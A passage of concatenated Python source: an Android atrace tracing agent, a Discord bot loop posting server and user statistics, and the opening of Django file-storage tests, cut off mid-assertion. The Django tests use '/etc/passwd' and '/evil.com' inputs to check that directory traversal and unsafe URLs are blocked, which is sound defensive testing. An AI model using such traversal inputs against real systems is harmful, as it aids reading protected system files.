LIST_CATEGORIES_ARGS, check_return=True)
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if not re.match(r'^\s*rs\s*-', c)]
print '\n'.join(categories)
if not devutils.HasRoot():
print '\nNOTE: more categories may be available with adb root\n'
def get_available_categories(config, device_sdk_version):
"""Gets the list of atrace categories available for tracing.
Args:
config: Tracing config.
device_sdk_version: Sdk version int of device to be queried.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories_output = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
categories = [c.split('-')[0].strip() for c in categories_output]
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if c != 'rs']
return categories
def try_create_agent(config):
"""Create an Atrace agent.
Args:
config: Command line config.
"""
if config.target != 'android':
return None
if config.from_file is not None:
return None
if not config.atrace_categories:
return None
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.JELLY_BEAN_MR2:
print ('Device SDK versions < 18 (Jellybean MR2) not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return None
return AtraceAgent(device_sdk_version)
def _construct_extra_atrace_args(config, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
config: Tracing config.
"""
extra_args = []
if config.app_name is not None:
extra_args.extend(['-a', config.app_name])
if config.kfuncs is not None:
extra_args.extend(['-k', config.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(config, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if config.compress_trace_data:
atrace_args.extend(['-z'])
if (config.trace_time is not None) and (config.trace_time > 0):
atrace_args.extend(['-t', str(config.trace_time)])
if (config.trace_buf_size is not None) and (config.trace_buf_size > 0):
atrace_args.extend(['-b', str(config.trace_buf_size)])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(config, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self, device_sdk_version):
super(AtraceAgent, self).__init__()
self._device_sdk_version = device_sdk_version
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._config = None
self._categories = None
def __repr__(self):
return 'atrace'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
assert config.atrace_categories, 'Atrace categories are missing!'
self._config = config
self._categories = config.atrace_categories
if isinstance(self._categories, list):
self._categories = ','.join(self._categories)
avail_cats = get_available_categories(config, self._device_sdk_version)
unavailable = [x for x in self._categories.split(',') if
x not in avail_cats]
self._categories = [x for x in self._categories.split(',') if
x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(config.device_serial_number)
self._device_serial_number = config.device_serial_number
self._tracer_args = _construct_atrace_args(config,
self._categories)
self._device_utils.RunShellCommand(
self._tracer_args + ['--async_start'], check_return=True)
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo trace_event_clock_sync: name=%s >' \
' /sys/kernel/debug/tracing/trace_marker' % sync_id
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time_module.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _stop_trace(self):
"""Stops atrace.
Note that prior to Api 23, --async-stop may not actually stop tracing.
Thus, this uses a fallback method of running a zero-length synchronous
trace if tracing is still on."""
self._device_utils.RunShellCommand(
self._tracer_args + ['--async_stop'], check_return=True)
is_trace_enabled_file = '/sys/kernel/debug/tracing/tracing_on'
if self._device_sdk_version < version_codes.MARSHMALLOW:
if int(self._device_utils.ReadFile(is_trace_enabled_file)):
# tracing was incorrectly left on, disable it
self._device_utils.RunShellCommand(
self._tracer_args + ['-t 0'], check_return=True)
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
dump_cmd = self._tracer_args + ['--async_dump']
result = self._device_utils.RunShellCommand(
dump_cmd, raw_output=True, check_return=True)
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
self._stop_trace()
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if _FIX_THREAD_IDS:
# Issue ps command to device and patch thread names
# TODO(catapult:#3215): Migrate to device.GetPids()
ps_dump = self._device_utils.RunShellCommand(
'ps -T -o USER,TID,PPID,VSIZE,RSS,WCHAN,ADDR=PC,S,CMD || ps -t',
shell=True, check_return=True)
thread_names = extract_thread_list(ps_dump)
trace_data = fix_thread_names(trace_data, thread_names)
if _FIX_MISSING_TGIDS:
# Issue printf command to device and patch tgids
procfs_dump = self._device_utils.RunShellCommand(
'printf "%s\n" /proc/[0-9]*/task/[0-9]*',
shell=True, check_return=True)
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if _FIX_CIRCULAR_TRACES:
trace_data = fix_circular_traces(trace_data)
return trace_data
def extract_thread_list(trace_lines):
"""Removes the thread list from the given trace data.
Args:
trace_lines: The text portion of the trace
Returns:
a map of thread ids to thread names
"""
threads = {}
# Assume any line that starts with USER is the header
header = -1
for i, line in enumerate(trace_lines):
cols = line.split()
if len(cols) >= 8 and cols[0] == 'USER':
header = i
break
if header == -1:
return threads
for line in trace_lines[header + 1:]:
cols = line.split(None, 8)
if len(cols) == 9:
tid = int(cols[1])
name = cols[8]
threads[tid] = name
return threads
def extract_tgids(trace_lines):
"""Removes the procfs dump from the given trace text
Args:
trace_lines: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
for line in trace_lines:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
def fix_thread_names(trace_data, thread_names):
"""Replaces thread ids with their names.
Args:
trace_data: The atrace data.
thread_names: A mapping of thread ids to thread names.
Returns:
The updated trace data.
"""
def repl(m):
tid = int(m.group(2))
if tid > 0:
name = thread_names.get(tid)
if name is None:
name = m.group(1)
if name == '<...>':
name = '<' + str(tid) + '>'
thread_names[tid] = name
return name + '-' + m.group(2)
else:
return m.group(0)
# matches something like:
# Binder_2-895, or com.google.android.inputmethod.latin-1078 etc...
trace_data = re.sub(r'^\s*(\S+)-(\d+)', repl, trace_data,
flags=re.MULTILINE)
return trace_data
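# Illustrative sketch (not part of the original agent): fix_thread_names() applied
# to a single synthetic trace line, with a ps-derived name supplied for tid 895.
def _example_fix_thread_names():
  line = '<...>-895   ( 128) [001] ...1  1.0: sched_wakeup'
  fixed = fix_thread_names(line, {895: 'Binder_2'})
  assert 'Binder_2-895' in fixed and '<...>' not in fixed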
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
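# Illustrative sketch (not part of the original agent): fix_circular_traces() on a
# tiny synthetic trace. Events before the last 'CPU buffer started' marker are
# dropped, while the leading '#' header lines are kept for the importer.
def _example_fix_circular_traces():
  sample = ('# tracer: nop\n'
            'old-1     [000]  1.0: event_before_overflow\n'
            '##### CPU 1 buffer started ####\n'
            'new-2     [001]  2.0: event_after_overflow\n')
  fixed = fix_circular_traces(sample)
  assert 'event_before_overflow' not in fixed
  assert 'event_after_overflow' in fixed and fixed.startswith('# tracer: nop')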
class AtraceConfig(tracing_agents.TracingConfig):
def __init__(self, atrace_categories, trace_buf_size, kfuncs,
app_name, compress_trace_data, from_file,
device_serial_number, trace_time, target):
tracing_agents.TracingConfig.__init__(self)
self.atrace_categories = atrace_categories
self.trace_buf_size = trace_buf_size
self.kfuncs = kfuncs
self.app_name = app_name
self.compress_trace_data = compress_trace_data
self.from_file = from_file
self.device_serial_number = device_serial_number
self.trace_time = trace_time
self.target = target
def add_options(parser):
options = optparse.OptionGroup(parser, 'Atrace options')
options.add_option('--atrace-categories', dest='atrace_categories',
help='Select atrace categories with a comma-delimited '
'list, e.g. --atrace-categories=cat1,cat2,cat3')
options.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
options.add_option('--no-compress', dest='compress_trace_data',
default=True, action='store_false',
help='Tell the device not to send the trace data in '
'compressed form.')
options.add_option('-a', '--app', dest='app_name', default=None,
type='string', action='store',
help='enable application-level tracing for '
'comma-separated list of app cmdlines')
options.add_option('--from-file', dest='from_file',
action='store', help='read the trace from a '
'file (compressed) rather than running a '
'live trace')
return options
def get_config(options):
return AtraceConfig(options.atrace_categories,
options.trace_buf_size, options.kfuncs,
options.app_name, options.compress_trace_data,
options.from_file, options.device_serial_number,
options.trace_time, options.target)
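# Illustrative sketch (assumption: the remaining fields consumed by get_config()
# -- trace_buf_size, trace_time, target, device_serial_number -- are added by the
# caller's own option groups). Shows how the atrace option group is meant to be
# wired into an optparse parser.
def _example_parse_atrace_options():
  parser = optparse.OptionParser()
  parser.add_option_group(add_options(parser))
  options, _ = parser.parse_args(['--atrace-categories=sched,freq,gfx'])
  return options.atrace_categories  # 'sched,freq,gfx'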
|
ready_loop.py
|
# Called when the bot is ready to be used
import asyncio
import datetime
import sqlite3
import threading
import time
import discord
from Data.Const_variables.import_const import Login, Ids
from Script.import_emojis import Emojis
from Script.import_functions import int_to_str
async def ready_loop(self):
if self.id == 704688212832026724:
status_channel = self.get_channel(733089353634545684)
msg = await status_channel.send(f"{Emojis['Yes']} Connected")
await msg.edit(content=f"{Emojis['Yes']} Connected `{msg.created_at.replace(microsecond=0).isoformat(sep=' ')}` UTC-0")
clash_info = self
def thread_weekly_stats():
while True:
date = datetime.datetime.now()
monday = datetime.date.today() + datetime.timedelta(days=(7 - date.weekday()))
monday = datetime.datetime(monday.year, monday.month, monday.day)
diff = monday - date
time.sleep(diff.seconds + diff.days * 24 * 3600)
print("Weekly Stats", datetime.datetime.now())
# ===== WEEKLY STATS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class WeeklyStatsBot(discord.Client):
weekly_bot_connected = asyncio.Event()
def __init__(self):
super().__init__()
async def on_ready(self):
channel = self.get_channel(Ids["Weekly_stats_channel"])
old_servers_count = 0
async for message in channel.history(limit=None):
if message.is_system():
await message.delete()
if message.pinned:
old_servers_count = int(message.content)
await message.delete()
break
msg = await channel.send(str(len(clash_info.guilds)))
await msg.pin()
diff_servers_count = len(clash_info.guilds) - old_servers_count
diff_servers_count = "%+d" % (diff_servers_count)
await channel.send(f"Evolution of number of servers this week : {diff_servers_count}")
await self.logout()
async def on_disconnect(self):
self.weekly_bot_connected.set()
weekly_stats_bot = WeeklyStatsBot()
async def login():
await weekly_stats_bot.login(Login["discord"]["beta"])
loop.run_until_complete(login())
async def wrapped_connect():
try:
await weekly_stats_bot.connect()
except Exception as e:
print("Weekly, ", e)
await weekly_stats_bot.close()
weekly_stats_bot.weekly_bot_connected.set()
loop.create_task(wrapped_connect())
async def check_close():
futures = [weekly_stats_bot.weekly_bot_connected.wait()]
await asyncio.wait(futures)
loop.run_until_complete(check_close())
loop.close()
thread = threading.Thread(target=thread_weekly_stats, args=())
thread.start()
def thread_monthly_users():
while True:
date = datetime.datetime.now()
if date.month < 12:
day1 = datetime.datetime(date.year, date.month + 1, 1)
else:
day1 = datetime.datetime(date.year + 1, 1, 1)
diff = day1 - date
time.sleep(diff.seconds + diff.days * 24 * 3600 + 3600) # 1h00 instead of 0h00 to avoid conflicts with WeeklyStats
print("Monthly Users Stats", datetime.datetime.now())
# ===== MONTHLY USERS =====
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
class MonthlyUsersBot(discord.Client):
monthly_bot_connected = asyncio.Event()
def __init__(self):
super().__init__()
async def on_ready(self):
connection = sqlite3.connect("Data/Modifiable_variables.sqlite")
cursor = connection.cursor()
cursor.execute("SELECT COUNT(*) FROM BotUsage")
nb_monthly_users = cursor.fetchone()[0]
text = f"Monthly users : {nb_monthly_users}"
channel = self.get_channel(Ids["Monthly_stats_channel"])
await channel.send(text)
if len(str(date.month)) == 1:
month = "0" + str(date.month)
else:
month = str(date.month)
w = f"""CREATE TABLE IF NOT EXISTS BotUsage_{date.year}_{month} AS SELECT * FROM BotUsage"""
cursor.execute(w)
cursor.execute("DELETE FROM BotUsage")
connection.commit()
await self.logout()
async def on_disconnect(self):
self.monthly_bot_connected.set()
monthly_users_bot = MonthlyUsersBot()
async def login():
await monthly_users_bot.login(Login["discord"]["beta"])
loop.run_until_complete(login())
async def wrapped_connect():
try:
await monthly_users_bot.connect()
except Exception as e:
print("Monthly, ", e)
await monthly_users_bot.close()
monthly_users_bot.monthly_bot_connected.set()
loop.create_task(wrapped_connect())
async def check_close():
futures = [monthly_users_bot.monthly_bot_connected.wait()]
await asyncio.wait(futures)
loop.run_until_complete(check_close())
loop.close()
thread = threading.Thread(target=thread_monthly_users, args=())
thread.start()
print("Connected")
while True:
nb_guilds = len(self.guilds)
act = discord.Activity(type=discord.ActivityType.watching, name=int_to_str(nb_guilds) + " servers")
await self.change_presence(status=discord.Status.online, activity=act)
await asyncio.sleep(60)
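# Illustrative sketch (not part of the original bot): the sleep interval computed
# inside thread_weekly_stats, shown standalone. timedelta.seconds only covers the
# sub-day remainder, so the days component has to be added back explicitly.
def _seconds_until_next_monday(now=None):
    now = now or datetime.datetime.now()
    next_monday = now.date() + datetime.timedelta(days=(7 - now.weekday()))
    next_monday = datetime.datetime(next_monday.year, next_monday.month, next_monday.day)
    diff = next_monday - now
    return diff.seconds + diff.days * 24 * 3600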
|
tests.py
|
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from pathlib import Path
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import (
FileSystemStorage,
Storage as BaseStorage,
default_storage,
get_storage_class,
)
from django.core.files.uploadedfile import (
InMemoryUploadedFile,
SimpleUploadedFile,
TemporaryUploadedFile,
)
from django.db.models import FileField
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase,
SimpleTestCase,
TestCase,
override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from django.utils._os import symlinks_supported
from .models import (
Storage,
callable_storage,
temp_storage,
temp_storage_location,
)
FILE_SUFFIX_REGEX = "[A-Za-z0-9]{7}"
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class("django.core.files.storage.FileSystemStorage"),
FileSystemStorage,
)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import doesn't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class("storage.NonexistentStorage")
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class doesn't exist.
"""
with self.assertRaises(ImportError):
get_storage_class("django.core.files.storage.NonexistentStorage")
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module doesn't exist.
"""
with self.assertRaisesMessage(
ImportError, "No module named 'django.core.files.nonexistent_storage'"
):
get_storage_class(
"django.core.files.nonexistent_storage.NonexistentStorage"
)
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {"location": temp_storage_location})
kwargs_orig = {
"location": temp_storage_location,
"base_url": "http://myfiles.example.com/",
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy("app:url"))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(
location=self.temp_dir, base_url="/test_media_url/"
)
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix="aBc")
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
An empty location falls back to the current working directory.
"""
storage = self.storage_class(location="")
self.assertEqual(storage.base_location, "")
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists("storage_test"))
f = self.storage.open("storage_test", "w")
f.write("storage contents")
f.close()
self.assertTrue(self.storage.exists("storage_test"))
f = self.storage.open("storage_test", "r")
self.assertEqual(f.read(), "storage contents")
f.close()
self.storage.delete("storage_test")
self.assertFalse(self.storage.exists("storage_test"))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE="Africa/Algiers")
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists("test.file.tz.on"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file.tz.on", f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE="Africa/Algiers")
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists("test.file.tz.off"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file.tz.off", f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a datetime for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(
atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name)))
)
self.assertLess(
timezone.now() - self.storage.get_accessed_time(f_name),
timedelta(seconds=2),
)
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(
ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name)))
)
self.assertLess(
timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2)
)
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
self.assertEqual(
mtime, datetime.fromtimestamp(os.path.getmtime(self.storage.path(f_name)))
)
self.assertLess(
timezone.now() - self.storage.get_modified_time(f_name),
timedelta(seconds=2),
)
@requires_tz_support
def test_file_get_modified_time_timezone(self):
self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f.name = "test.file"
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists("path/to"))
self.storage.save("path/to/test.file", ContentFile("file saved with path"))
self.assertTrue(self.storage.exists("path/to"))
with self.storage.open("path/to/test.file") as f:
self.assertEqual(f.read(), b"file saved with path")
self.assertTrue(
os.path.exists(os.path.join(self.temp_dir, "path", "to", "test.file"))
)
self.storage.delete("path/to/test.file")
@unittest.skipUnless(
symlinks_supported(), "Must be able to symlink to run this test."
)
def test_file_save_broken_symlink(self):
"""A new path is created on save when a broken symlink is supplied."""
nonexistent_file_path = os.path.join(self.temp_dir, "nonexistent.txt")
broken_symlink_path = os.path.join(self.temp_dir, "symlink.txt")
os.symlink(nonexistent_file_path, broken_symlink_path)
f = ContentFile("some content")
f_name = self.storage.save(broken_symlink_path, f)
self.assertIs(os.path.exists(os.path.join(self.temp_dir, f_name)), True)
def test_save_doesnt_close(self):
with TemporaryUploadedFile("test", "text/plain", 1, "utf8") as file:
file.write(b"1")
file.seek(0)
self.assertFalse(file.closed)
self.storage.save("path/to/test.file", file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
file = InMemoryUploadedFile(StringIO("1"), "", "test", "text/plain", 1, "utf8")
with file:
self.assertFalse(file.closed)
self.storage.save("path/to/test.file", file)
self.assertFalse(file.closed)
self.assertFalse(file.file.closed)
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists("test.file"))
f = ContentFile("custom contents")
f_name = self.storage.save("test.file", f)
self.assertEqual(self.storage.path(f_name), os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the web.
"""
self.assertEqual(
self.storage.url("test.file"), self.storage.base_url + "test.file"
)
# should encode special chars except ~!*()'
# like the encodeURIComponent() JavaScript function does
self.assertEqual(
self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
"/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file",
)
self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")
# should translate os path separator(s) to the url path separator
self.assertEqual(
self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file"
)
# #25905: remove leading slashes from file names to prevent unsafe url output
self.assertEqual(self.storage.url("/evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url("///evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(r"\\\evil.com"), "/test_media_url/evil.com")
self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
"""
File storage returns a url even when its base_url is unset or modified.
"""
self.storage.base_url = None
with self.assertRaises(ValueError):
self.storage.url("test.file")
# #22717: missing ending slash in base_url should be auto-corrected
storage = self.storage_class(
location=self.temp_dir, base_url="/no_ending_slash"
)
self.assertEqual(
storage.url("test.file"), "%s%s" % (storage.base_url, "test.file")
)
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists("storage_test_1"))
self.assertFalse(self.storage.exists("storage_test_2"))
self.assertFalse(self.storage.exists("storage_dir_1"))
self.storage.save("storage_test_1", ContentFile("custom content"))
self.storage.save("storage_test_2", ContentFile("custom content"))
os.mkdir(os.path.join(self.temp_dir, "storage_dir_1"))
self.addCleanup(self.storage.delete, "storage_test_1")
self.addCleanup(self.storage.delete, "storage_test_2")
for directory in ("", Path("")):
with self.subTest(directory=directory):
dirs, files = self.storage.listdir(directory)
self.assertEqual(set(dirs), {"storage_dir_1"})
self.assertEqual(set(files), {"storage_test_1", "storage_test_2"})
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists("..")
with self.assertRaises(SuspiciousFileOperation):
self.storage.exists("/etc/passwd")
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
other_temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = "CaSe_SeNsItIvE"
file = other_temp_storage.open(mixed_case, "w")
file.write("storage contents")
file.close()
self.assertEqual(
